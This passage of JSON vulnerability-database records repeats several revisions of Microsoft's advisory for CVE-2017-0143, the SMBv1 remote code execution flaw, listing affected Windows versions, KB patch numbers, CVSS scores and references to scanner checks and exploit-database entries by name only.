"KB3213986", "KB3177186", "KB4012217", "KB4012212", "KBMS16-110, 3187754", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": 
""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows 
Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", 
"kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": 
"KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T08:44:10", "differentElements": ["msAffectedSoftware"], "edition": 19}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-07T10:44:22", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-07T10:44:22", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-07T10:44:22", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012212", "KB3213986", "KB3210720", "KB3205401", "KB4012598", "KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4013429", "KB4012216", "KB4012606", "KB3210721", "KB4012215", "KB3205409", "KB4012213", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 
R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 
2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T10:44:22", "differentElements": ["msAffectedSoftware"], "edition": 20}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-08T14:45:18", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": 
["KLA11902", "KLA10977", "KLA10979"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-08T14:45:18", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-08T14:45:18", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB4012214", "KB4012217", "KB4012212", "KB4013429", "KB4012213", "KB3210721", "KB3212646", "KB3210720", "KB4012606", "KB3177186", "KB4012216", "KB3205409", "KB3213986", "KB4012598", "KBMS16-110, 3187754", "KB4013198", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": 
""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows 
